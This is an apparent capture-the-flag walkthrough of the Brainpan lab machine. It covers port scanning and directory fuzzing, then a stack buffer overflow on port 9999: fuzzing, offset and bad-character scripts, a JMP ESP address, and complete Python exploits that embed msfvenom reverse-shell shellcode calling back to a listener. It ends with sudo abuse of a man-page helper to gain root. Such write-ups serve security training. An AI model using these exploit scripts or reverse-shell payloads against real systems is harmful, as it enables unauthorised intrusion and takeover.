
BrainPanOne Walkthrough

$ nmap -p0-65535 -vvv 10.10.253.240 -T4
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-15 18:56 IST
Initiating Ping Scan at 18:56
Scanning 10.10.253.240 [2 ports]
Completed Ping Scan at 18:56, 0.16s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:56
Completed Parallel DNS resolution of 1 host. at 18:56, 6.54s elapsed
DNS resolution of 1 IPs took 6.54s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating Connect Scan at 18:56
Scanning 10.10.253.240 [2 ports]
Discovered open port 10000/tcp on 10.10.253.240
Discovered open port 9999/tcp on 10.10.253.240
Completed Connect Scan at 18:56, 0.16s elapsed (2 total ports)
Nmap scan report for 10.10.253.240
Host is up, received conn-refused (0.16s latency).
Scanned at 2021-07-15 18:56:17 IST for 7s

PORT      STATE SERVICE          REASON
9999/tcp  open  abyss            syn-ack
10000/tcp open  snet-sensor-mgmt syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.89 seconds

$ nmap -p9999,10000 -sV -sC 10.10.253.240
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-15 18:59 IST
Nmap scan report for 10.10.253.240
Host is up (0.16s latency).

PORT      STATE SERVICE VERSION
9999/tcp  open  abyss?
| fingerprint-strings:
|   NULL:
|     _| _|
|     _|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
|     _|_| _| _| _| _| _| _| _| _| _| _| _|
|     _|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
|     [________________________ WELCOME TO BRAINPAN _________________________]
|_    ENTER THE PASSWORD
10000/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.3)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.3
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.96 seconds

From the scanning phase we know that a custom service, brainpan, is listening on port 9999 and a Python SimpleHTTPServer on port 10000.

Let's check the logic of brainpan:

$ nc -nv 10.10.253.240 9999
(UNKNOWN) [10.10.253.240] 9999 (?) open
_|                            _|
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_|
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|
                                            _|

[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD

                          >> password
                          ACCESS DENIED

Once connected, we are greeted with the banner and asked for a password; a wrong guess returns ACCESS DENIED.

Let's check the web server.

[screenshot: home page of the web server]

There is nothing much on the home page.

Let's fuzz for directories and files:

$ ffuf -t 200 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://10.10.253.240:10000/FUZZ -ic -e .php,.html,.txt,.php3,.php5,php7

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.253.240:10000/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Extensions       : .php .html .txt .php3 .php5 php7
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 200
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

                        [Status: 200, Size: 215, Words: 7, Lines: 9]
index.html              [Status: 200, Size: 215, Words: 7, Lines: 9]
bin                     [Status: 301, Size: 0, Words: 1, Lines: 1]
:: Progress: [1543829/1543829] :: Job [1/1] :: 172 req/sec :: Duration: [0:00:35] :: Errors: 0 ::

We have a bin directory; let's navigate to it.

[screenshot: brainpan.exe listed in the bin directory]

Download it and check the binary.

[screenshot: the downloaded brainpan.exe]

This is the same binary that is running on port 9999 on the target server.

Let's fuzz for a buffer overflow (BOF):

#!/usr/bin/env python3

import socket, time, sys

ip = "192.168.30.133"   # host running the lab copy of the brainpan binary
port = 9999

timeout = 5


password = b"A" * 100


while True:
  try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
      s.settimeout(timeout)
      s.connect((ip, port))

      # For receiving Banner
      s.recv(2048)

      print("Fuzzing with {} bytes".format(len(password)))

      # sending password
      s.send(password)

      # For receiving Access Denied message
      s.recv(1024)
  except (socket.timeout, OSError):
    # a timeout or a refused/reset connection means the service went down
    print("Fuzzing crashed at {} bytes".format(len(password)))
    sys.exit(0)
  # grow the input by 100 bytes per round
  password += b"A"*100
  time.sleep(1)

$ ./fuzzy.py
Fuzzing with 100 bytes
Fuzzing with 200 bytes
Fuzzing with 300 bytes
Fuzzing with 400 bytes
Fuzzing with 500 bytes
Fuzzing with 600 bytes
Fuzzing crashed at 600 bytes

Testing for the crash at roughly 600 bytes:

#!/usr/bin/env python3

import socket
import struct


ip = "192.168.30.133"
port = 9999

total_length = 600


payload = [
        b"A"*total_length
]

payload = b"".join(payload)

s = socket.socket()
s.connect((ip, port))
s.recv(2048)
s.send(payload)
s.close()

[screenshot: access violation in the debugger after sending 600 bytes]

Finding the offset

msf-pattern_create -l 600

#!/usr/bin/env python3

import socket

ip = "192.168.30.133"
port = 9999

total_length = 600


# 600-byte cyclic pattern from msf-pattern_create, sent in place of the password
pattern = b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9"

s = socket.socket()
s.connect((ip, port))
s.recv(2048)
s.send(pattern)
s.close()

[screenshot: EIP overwritten with pattern bytes (35724134)]

$ msf-pattern_offset -l 600 -q 35724134
[*] Exact match at offset 524

We got the offset as 524.
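The pattern_create / pattern_offset steps above can be reproduced without Metasploit. This is an added example, not the walkthrough's code: it regenerates the same cyclic pattern and looks up the EIP value 0x35724134 from the crash, taking into account that the debugger shows the register big-endian while the bytes sit in memory little-endian (the function names are my own).

```python
#!/usr/bin/env python3
"""Re-implementation of the msf-pattern_create / msf-pattern_offset logic.

The pattern is the sequence of 3-byte groups "Aa0", "Aa1", ..., "Aa9",
"Ab0", ... (uppercase, lowercase, digit), cut at the requested length.
"""
import string
import struct


def pattern_create(length: int) -> bytes:
    """Return the first `length` bytes of the cyclic pattern."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])      # only reached if length > 20280


def pattern_offset(value, length: int = 600):
    """Locate `value` in the pattern of the given length.

    `value` is either the 32-bit integer read from EIP or 4 raw bytes.
    A register value is packed with "<I" (little-endian) before searching,
    because that is the order in which the bytes were written to the stack.
    Returns the offset, or None if the value is not part of the pattern.
    """
    needle = struct.pack("<I", value) if isinstance(value, int) else value
    idx = pattern_create(length).find(needle)
    return None if idx == -1 else idx


if __name__ == "__main__":
    # EIP value observed in the walkthrough's crash -> offset 524
    print(pattern_offset(0x35724134))          # 524
    print(pattern_create(600)[524:528])        # b'4Ar5'
```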

Verifying the offset

#!/usr/bin/env python3

import socket

ip = "192.168.30.133"
port = 9999


total_length = 600

offset=524

EIP=b"BBBB"

payload = [ b"A"*offset,
            EIP,
            b"C"*int(total_length-offset-len(EIP))
]

payload = b"".join(payload)

s = socket.socket()
s.connect( (ip, port))
s.recv(2048)
s.send(payload)
s.close()

[screenshot: EIP overwritten with BBBB, confirming the offset]

Finding the bad characters

!mona bytearray -b "\x00"

[screenshot: mona bytearray output]

#!/usr/bin/env python3

import socket

ip = "192.168.30.133"
port = 9999


total_length = 600

offset = 524

EIP=b"BBBB"

allchars = b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"

payload = [ b"A"*offset,
        EIP,
        allchars,
        b"C"*int(total_length - offset - len(EIP) - len(allchars))
]

payload = b"".join(payload)

s = socket.socket()
s.connect((ip, port))
s.recv(2048)
s.send(payload)
s.close()

[screenshot: ESP pointing at the byte array in the debugger]

!mona compare -f C:\Users\chandu\AppData\Local\VirtualStore\Program Files (x86)\Immunity Inc\Immunity Debugger\bytearray.bin -a 0028F930

[screenshot: mona compare results]

From this we can see that the null byte is the only bad character.

Finding a JMP ESP address to place in EIP
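As an added example (not the walkthrough's code and not mona's), this is a simplified version of what !mona compare does: it walks the byte array that was sent against the bytes found at ESP and classifies each mismatch, since a bad character can be replaced, dropped, or end the copy entirely (the null byte case). The memory dumps are constructed inline to stand in for the debugger's view.

```python
#!/usr/bin/env python3
"""Simplified bad-character comparison: which bytes of the sent array were
mangled on the stack? The dumps in __main__ are constructed samples."""


def bytearray_without(excluded: bytes = b"\x00") -> bytes:
    """All byte values 0x00..0xff minus the ones already known to be bad
    (same content as `!mona bytearray -b "\\x00"`)."""
    return bytes(b for b in range(256) if b not in excluded)


def find_bad_chars(sent: bytes, observed: bytes) -> dict:
    """Walk `sent` against `observed`, the memory read at the array's start.

    Each mismatch is classified as replaced (one byte changed in place),
    dropped (the byte vanished and the rest shifted left) or a truncation
    (nothing after it lines up, e.g. a string copy stopped on that byte).
    Read at least as many bytes from memory as were sent, otherwise the end
    of a short dump is reported as a truncation.
    """
    bad, i, j = [], 0, 0
    while i < len(sent):
        if j < len(observed) and sent[i] == observed[j]:
            i, j = i + 1, j + 1
            continue
        bad.append(sent[i])
        rest = sent[i + 1:i + 5]                 # what should follow the bad byte
        if observed[j + 1:j + 5] == rest:        # replaced in place
            i, j = i + 1, j + 1
        elif observed[j:j + 4] == rest:          # dropped from the copy
            i += 1
        else:                                    # copy ended on this byte
            return {"bad": bad, "truncated_at": sent[i]}
    return {"bad": bad, "truncated_at": None}


if __name__ == "__main__":
    sent = bytearray_without(b"\x00")
    # Intact copy followed by unrelated stack data: nothing else is bad,
    # which is the result the walkthrough reaches for brainpan.
    print(find_bad_chars(sent, sent + b"\xcc" * 16))
    # Constructed cases: 0x0a rewritten to 0x00, 0x0d stripped, copy cut at 0x20
    print(find_bad_chars(sent, sent.replace(b"\x0a", b"\x00")))
    print(find_bad_chars(sent, sent.replace(b"\x0d", b"")))
    print(find_bad_chars(sent, sent[:sent.index(0x20)] + b"\xcc" * 8))
```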

!mona jmp -r esp -cpb "\x00"

[screenshot: mona jmp results]

We got the address 0x311712f3.

Generating the payload

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.30.133 LPORT=9898 -b "\x00" -f py

Executing the script

#!/usr/bin/env python3

import socket
import struct

ip = "192.168.30.133"
port = 9999


total_length = 600

offset=524

NEW_EIP = struct.pack("<I", 0x311712f3)

nop_ramp = b"\x90" * 16


#EIP=b"BBBB"

buf =  b""
buf += b"\xbd\x9e\xc2\x8d\x91\xda\xdd\xd9\x74\x24\xf4\x5a\x33"
buf += b"\xc9\xb1\x52\x31\x6a\x12\x03\x6a\x12\x83\x5c\xc6\x6f"
buf += b"\x64\x9c\x2f\xed\x87\x5c\xb0\x92\x0e\xb9\x81\x92\x75"
buf += b"\xca\xb2\x22\xfd\x9e\x3e\xc8\x53\x0a\xb4\xbc\x7b\x3d"
buf += b"\x7d\x0a\x5a\x70\x7e\x27\x9e\x13\xfc\x3a\xf3\xf3\x3d"
buf += b"\xf5\x06\xf2\x7a\xe8\xeb\xa6\xd3\x66\x59\x56\x57\x32"
buf += b"\x62\xdd\x2b\xd2\xe2\x02\xfb\xd5\xc3\x95\x77\x8c\xc3"
buf += b"\x14\x5b\xa4\x4d\x0e\xb8\x81\x04\xa5\x0a\x7d\x97\x6f"
buf += b"\x43\x7e\x34\x4e\x6b\x8d\x44\x97\x4c\x6e\x33\xe1\xae"
buf += b"\x13\x44\x36\xcc\xcf\xc1\xac\x76\x9b\x72\x08\x86\x48"
buf += b"\xe4\xdb\x84\x25\x62\x83\x88\xb8\xa7\xb8\xb5\x31\x46"
buf += b"\x6e\x3c\x01\x6d\xaa\x64\xd1\x0c\xeb\xc0\xb4\x31\xeb"
buf += b"\xaa\x69\x94\x60\x46\x7d\xa5\x2b\x0f\xb2\x84\xd3\xcf"
buf += b"\xdc\x9f\xa0\xfd\x43\x34\x2e\x4e\x0b\x92\xa9\xb1\x26"
buf += b"\x62\x25\x4c\xc9\x93\x6c\x8b\x9d\xc3\x06\x3a\x9e\x8f"
buf += b"\xd6\xc3\x4b\x1f\x86\x6b\x24\xe0\x76\xcc\x94\x88\x9c"
buf += b"\xc3\xcb\xa9\x9f\x09\x64\x43\x5a\xda\x4b\x3c\x7a\x9a"
buf += b"\x24\x3f\x82\xbc\x1e\xb6\x64\xaa\x4e\x9f\x3f\x43\xf6"
buf += b"\xba\xcb\xf2\xf7\x10\xb6\x35\x73\x97\x47\xfb\x74\xd2"
buf += b"\x5b\x6c\x75\xa9\x01\x3b\x8a\x07\x2d\xa7\x19\xcc\xad"
buf += b"\xae\x01\x5b\xfa\xe7\xf4\x92\x6e\x1a\xae\x0c\x8c\xe7"
buf += b"\x36\x76\x14\x3c\x8b\x79\x95\xb1\xb7\x5d\x85\x0f\x37"
buf += b"\xda\xf1\xdf\x6e\xb4\xaf\x99\xd8\x76\x19\x70\xb6\xd0"
buf += b"\xcd\x05\xf4\xe2\x8b\x09\xd1\x94\x73\xbb\x8c\xe0\x8c"
buf += b"\x74\x59\xe5\xf5\x68\xf9\x0a\x2c\x29\x09\x41\x6c\x18"
buf += b"\x82\x0c\xe5\x18\xcf\xae\xd0\x5f\xf6\x2c\xd0\x1f\x0d"
buf += b"\x2c\x91\x1a\x49\xea\x4a\x57\xc2\x9f\x6c\xc4\xe3\xb5"

shellcode = buf

payload = [ b"A"*offset,
        NEW_EIP,
        nop_ramp,
        shellcode,
        b"C"*int(total_length - offset - len(NEW_EIP) - len(nop_ramp) - len(shellcode))
]

payload = b"".join(payload)
s=socket.socket()
s.connect((ip, port))
s.recv(2048)
s.send(payload)
s.close()

Getting the initial access

The target is a Linux machine, so the payload is regenerated for Linux (LHOST is the listener's address):

msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=9898 -b "\x00" -f py

#!/usr/bin/env python3

import socket
import struct

ip = "192.168.30.133"   # change to the target ip
port = 9999


total_length = 600

offset=524

NEW_EIP = struct.pack("<I", 0x311712f3)

nop_ramp = b"\x90" * 16


#EIP=b"BBBB"

buf =  b""   # replace the lines below with the payload generated by msfvenom
buf += b"\xbd\x9e\xc2\x8d\x91\xda\xdd\xd9\x74\x24\xf4\x5a\x33"
buf += b"\xc9\xb1\x52\x31\x6a\x12\x03\x6a\x12\x83\x5c\xc6\x6f"
buf += b"\x64\x9c\x2f\xed\x87\x5c\xb0\x92\x0e\xb9\x81\x92\x75"
buf += b"\xca\xb2\x22\xfd\x9e\x3e\xc8\x53\x0a\xb4\xbc\x7b\x3d"
buf += b"\x7d\x0a\x5a\x70\x7e\x27\x9e\x13\xfc\x3a\xf3\xf3\x3d"
buf += b"\xf5\x06\xf2\x7a\xe8\xeb\xa6\xd3\x66\x59\x56\x57\x32"
buf += b"\x62\xdd\x2b\xd2\xe2\x02\xfb\xd5\xc3\x95\x77\x8c\xc3"
buf += b"\x14\x5b\xa4\x4d\x0e\xb8\x81\x04\xa5\x0a\x7d\x97\x6f"
buf += b"\x43\x7e\x34\x4e\x6b\x8d\x44\x97\x4c\x6e\x33\xe1\xae"
buf += b"\x13\x44\x36\xcc\xcf\xc1\xac\x76\x9b\x72\x08\x86\x48"
buf += b"\xe4\xdb\x84\x25\x62\x83\x88\xb8\xa7\xb8\xb5\x31\x46"
buf += b"\x6e\x3c\x01\x6d\xaa\x64\xd1\x0c\xeb\xc0\xb4\x31\xeb"
buf += b"\xaa\x69\x94\x60\x46\x7d\xa5\x2b\x0f\xb2\x84\xd3\xcf"
buf += b"\xdc\x9f\xa0\xfd\x43\x34\x2e\x4e\x0b\x92\xa9\xb1\x26"
buf += b"\x62\x25\x4c\xc9\x93\x6c\x8b\x9d\xc3\x06\x3a\x9e\x8f"
buf += b"\xd6\xc3\x4b\x1f\x86\x6b\x24\xe0\x76\xcc\x94\x88\x9c"
buf += b"\xc3\xcb\xa9\x9f\x09\x64\x43\x5a\xda\x4b\x3c\x7a\x9a"
buf += b"\x24\x3f\x82\xbc\x1e\xb6\x64\xaa\x4e\x9f\x3f\x43\xf6"
buf += b"\xba\xcb\xf2\xf7\x10\xb6\x35\x73\x97\x47\xfb\x74\xd2"
buf += b"\x5b\x6c\x75\xa9\x01\x3b\x8a\x07\x2d\xa7\x19\xcc\xad"
buf += b"\xae\x01\x5b\xfa\xe7\xf4\x92\x6e\x1a\xae\x0c\x8c\xe7"
buf += b"\x36\x76\x14\x3c\x8b\x79\x95\xb1\xb7\x5d\x85\x0f\x37"
buf += b"\xda\xf1\xdf\x6e\xb4\xaf\x99\xd8\x76\x19\x70\xb6\xd0"
buf += b"\xcd\x05\xf4\xe2\x8b\x09\xd1\x94\x73\xbb\x8c\xe0\x8c"
buf += b"\x74\x59\xe5\xf5\x68\xf9\x0a\x2c\x29\x09\x41\x6c\x18"
buf += b"\x82\x0c\xe5\x18\xcf\xae\xd0\x5f\xf6\x2c\xd0\x1f\x0d"
buf += b"\x2c\x91\x1a\x49\xea\x4a\x57\xc2\x9f\x6c\xc4\xe3\xb5"

shellcode = buf

payload = [ b"A"*offset,
        NEW_EIP,
        nop_ramp,
        shellcode,
        b"C"*int(total_length - offset - len(NEW_EIP) - len(nop_ramp) - len(shellcode))
]

payload = b"".join(payload)
s=socket.socket()
s.connect((ip, port))
s.recv(2048)
s.send(payload)
s.close()

By modifying and running the script, we got initial access.

[screenshot: reverse shell received]

Spawning TTY

whoami
puck
date
Thu Jul 15 10:31:22 CDT 2021
python -c 'import pty; pty.spawn("/bin/bash")'
puck@brainpan:/home/puck$ ^Z
[1]  + 10624 suspended  nc -nlvp 9898

$ stty raw -echo; fg
[1]  + 10624 continued  nc -nlvp 9898

puck@brainpan:/home/puck$ export TERM=xterm
puck@brainpan:/home/puck$ ls -l /home
total 12
drwx------ 4 anansi  anansi  4096 Mar  4  2013 anansi
drwx------ 7 puck    puck    4096 Mar  6  2013 puck
drwx------ 3 reynard reynard 4096 Mar  4  2013 reynard

puck@brainpan:/home/puck$ sudo -l
Matching Defaults entries for puck on this host:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User puck may run the following commands on this host:
    (root) NOPASSWD: /home/anansi/bin/anansi_util
puck@brainpan:/home/puck$
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util
Usage: /home/anansi/bin/anansi_util [action]
Where [action] is one of:
  - network
  - proclist
  - manual [command]
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util network
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP qlen 1000
    link/ether 02:be:d5:89:ab:bf brd ff:ff:ff:ff:ff:ff
    inet 10.10.253.240/16 brd 10.10.255.255 scope global eth0
    inet6 fe80::be:d5ff:fe89:abbf/64 scope link
       valid_lft forever preferred_lft forever
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util proclist
top - 10:38:34 up  2:19,  0 users,  load average: 0.00, 0.01, 0.03
Tasks:  72 total,   1 running,  71 sleeping,   0 stopped,   0 zombie
%Cpu(s):  0.1 us,  0.1 sy,  0.0 ni, 99.5 id,  0.2 wa,  0.0 hi,  0.0 si,  0.1 st
KiB Mem:   2064648 total,   135728 used,  1928920 free,    12600 buffers
KiB Swap:   520188 total,        0 used,   520188 free,    82156 cached

  PID USER      PR  NI  VIRT  RES  SHR S  %CPU %MEM    TIME+  COMMAND
    1 root      20   0  3500 1864 1280 S   0.0  0.1   0:00.73 init
    2 root      20   0     0    0    0 S   0.0  0.0   0:00.00 kthreadd
    3 root      20   0     0    0    0 S   0.0  0.0   0:00.22 ksoftirqd/0
    5 root      20   0     0    0    0 S   0.0  0.0   0:00.21 kworker/u:0
    6 root      rt   0     0    0    0 S   0.0  0.0   0:00.00 migration/0
    7 root      rt   0     0    0    0 S   0.0  0.0   0:00.03 watchdog/0
    8 root       0 -20     0    0    0 S   0.0  0.0   0:00.00 cpuset
    9 root       0 -20     0    0    0 S   0.0  0.0   0:00.00 khelper
   10 root      20   0     0    0    0 S   0.0  0.0   0:00.00 kdevtmpfs
   11 root       0 -20     0    0    0 S   0.0  0.0   0:00.00 netns
   12 root      20   0     0    0    0 S   0.0  0.0   0:00.00 xenwatch
   13 root      20   0     0    0    0 S   0.0  0.0   0:00.15 xenbus
   14 root      20   0     0    0    0 S   0.0  0.0   0:00.01 sync_supers
   15 root      20   0     0    0    0 S   0.0  0.0   0:00.00 bdi-default
   16 root       0 -20     0    0    0 S   0.0  0.0   0:00.00 kintegrityd
   17 root       0 -20     0    0    0 S   0.0  0.0   0:00.00 kblockd
   18 root       0 -20     0    0    0 S   0.0  0.0   0:00.00 ata_sff

puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util manual
No manual entry for manual
puck@brainpan:/home/puck$ man manual
No manual entry for manual
puck@brainpan:/home/puck$

Using the man command (run as root through anansi_util manual) to escalate privileges

sudo /home/anansi/bin/anansi_util manual man

[screenshot: privilege escalation via man]

[screenshot: root shell]